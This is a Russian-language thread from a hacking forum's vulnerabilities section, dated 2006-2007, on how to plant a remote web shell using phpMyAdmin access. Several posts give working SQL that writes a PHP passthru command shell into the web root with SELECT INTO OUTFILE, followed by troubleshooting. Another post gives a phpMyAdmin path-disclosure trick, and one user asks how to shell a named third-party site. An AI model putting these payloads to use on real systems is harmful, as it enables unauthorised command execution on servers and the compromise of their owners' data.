Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   PhpMyAdmin (https://forum.antichat.xyz/showthread.php?t=15870)

dimauz 14.03.2006 18:13
PhpMyAdmin
 
Возможно ли закачать на сервер удаленный веб шелл имея доступ к phpmyadmin ?

GreenBear 14.03.2006 18:21
UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;

dimauz 14.03.2006 19:44
Цитата:
Сообщение от Green_Bear
UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;
Не получается ... возможно я что-то делаю не так :(

GreenBear 14.03.2006 20:10
как это не работает?
попробуй так... раз там понять не можеш.
Код:
CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/home/user/www/shell.php' FROM `shell`;
DROP TABLE `shell`;
работает на 100% =)
/home/user/www/shell.php
замени на свой путь...

Azazel 14.03.2006 20:16
UPDATE `существующая таблица` SET `существующий параметер`='<? passthru("$cmd"); ?>'WHERE id=1;
SELECT `существующая таблица`, `существующий параметер` into OUTFILE '/home/user/полный серверный путь/shell.php' FROM существующая таблица where id=1;

Попробовал объяснить подробней.

Советую почитать как правильно задавать вопросы в технических форумах.

KEZ 14.03.2006 20:20
Цитата:
Не получается ... возможно я что-то делаю не так
Дело в том что нужно не втупую переписать код что тебе дал грин_бир а хотябы немного подумать, сменить названия директорий, к примеру..мдаа

dimauz 14.03.2006 20:28
Спасибо за помощь. Уже разобрался :cool:

c411k 16.03.2006 15:10
SELECT '<? passthru("$cmd"); ?>' into OUTFILE "/home/hosting/wwwdata/sm.php";

Ponchik 04.04.2006 10:46
Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'

~FoX~ 24.01.2007 10:51
разжуйте для noooба плз

_Great_ 24.01.2007 11:03
Выше все написано

~FoX~ 24.01.2007 11:42
ну а для полных нубов можете видео соорудить???

cardons 24.01.2007 11:50
Цитата:
Сообщение от Ponchik
Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'
Ты путь походу непрописываешь куда шелл залить.
Или возможно он ругаеться на : если ты пишешь полностью путь.

~FoX~ 24.01.2007 11:55
да мне бы хоть научиться файлы в phpmyadmin заливать

ice1k 24.01.2007 12:13
Цитата:
Сообщение от ~FoX~
разжуйте для noooба плз
Что именно тебе разжевать?

cardons 24.01.2007 12:14
Чтобы узнать путь сайта. Если версия phpmyadmin 2.6.*
То делай так phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE
Он тебе покажет путь.
Ну а вообще читай тему которые уже созданы
http://forum.antichat.ru/threadnav31153-1-10-phpMyAdmin.html

~FoX~ 24.01.2007 12:19
как remview залить на другой ip код к eго phpmyadmin я знаю

cardons 24.01.2007 12:23
Цитата:
Сообщение от ~FoX~
как remview залить на другой ip код к eго phpmyadmin я знаю
Нече непонял.Под словом код я как понимаю ты подразумеваешь путь а насчет ип нече непонял. Сформулируй нормальней.

~FoX~ 24.01.2007 12:56
всем спс инфа больше не требуется Ice мне помог)))

cardons 26.01.2007 03:42
Кто нить знает баги в версиях
2.8.2.4
и 2.8.2

cardons 26.01.2007 18:04
кто нибудь знает как с помощью этого http://l2db.ru/phpmyadmin/scripts/setup.php залить шелл?

ice1k 26.01.2007 23:06
Цитата:
Сообщение от cardons
кто нибудь знает как с помощью этого http://l2db.ru/phpmyadmin/scripts/setup.php залить шелл?
Было бы всё так просто ;)


Время: 10:40